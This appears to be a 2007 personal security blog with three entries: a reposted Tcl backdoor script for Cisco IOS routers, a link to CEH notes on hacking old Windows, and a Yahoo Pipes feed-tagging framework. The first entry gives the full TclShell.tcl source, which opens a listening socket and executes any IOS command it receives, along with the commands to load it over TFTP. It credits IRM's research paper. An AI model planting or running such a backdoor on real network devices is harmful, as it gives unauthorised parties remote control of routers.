Fork me on GitHub
Its the Code garbage collector. Mind dumps of daily coding antics from a frustrated silly little man. VBS, PHP, TCL, TK, PERL, C++, JAVA....what now? Ruby?
No Wait.. It should be just RUBY!

20071128

Shell code for IOS using TCLSH on Cisco devices..

An nice article that went out by IRM talked about simple way to create TCL backdoor for cisco IOS. You can read the white paper here.
Oops: didnt known what I was sourcing..

Router>en
Router#tclsh
Router(tcl)#source tftp://tftpserver/tclsh.tcl

Source:

# TclShell.tcl v0.1 by Andy Davis, IRM 2007
#
# IRM accepts no responsibility for the misuse of this code
# It is provided for demonstration purposes only
proc callback {sock addr port} {
fconfigure $sock -translation lf -buffering line
puts $sock " "
puts $sock "-------------------------------------"
puts $sock "TclShell v0.1 by Andy Davis, IRM 2007"
puts $sock "-------------------------------------"
puts $sock " "
set response [exec "sh ver | inc IOS"]
puts $sock $response
set response [exec "sh priv"]
puts $sock $response
puts $sock " "
puts $sock "Enter IOS command:"
fileevent $sock readable [list echo $sock]
}
proc echo {sock} {
global var
if {[eof $sock] || [catch {gets $sock line}]} {
} else {
set response [exec "$line"]
puts $sock $response
}
}
set port 1234
set sh [socket -server callback $port]
vwait var
close $sh

All material is IRM's, this is just a snippet from the article.

20071119

Low hangin fruit

Hacking old skool windows..

Notes from a CEH. Nothing new, but at least the basic are covered. This all should be automated by some wrapper so you don't waste time.. Generally you could do all this in Backtrack or similar builds.

http://hackathology.blogspot.com/2007/06/hacking-old-skoolz-windows.html

20071116

RSS / ATOM - Security Tagging Framework for Yahoo PIPES



I've been using YAHOO pipes for awhile to help filter some of the junk on full disclosure. Tagging became part of my daily habits so I thought it most appropriate to create auto taggers so I can read / filter much more quickly.

Security Tagging FrameWork

The basics of the PIPE is an array of regular expressions that strip off unneccessary titles, duplicates, responses, and add Pre-titles such as {Vulnerability}{Web-based}.

Ive also created an example on how to use the framework with existing YAHOO-PIPES.

Vulnerability Watch++ (Security Tagging Framework Example)

This PIPE aggregates two feeds and uniques them, and tags them utilizing the framework twice.

Side note:

GNUCitizen posted two nice articles on PIPES and their flexibility to be utilized with JSON database.

1. 5-generic-yahoo-pipes-hackers-cannot-live-without

2. Project Renaissance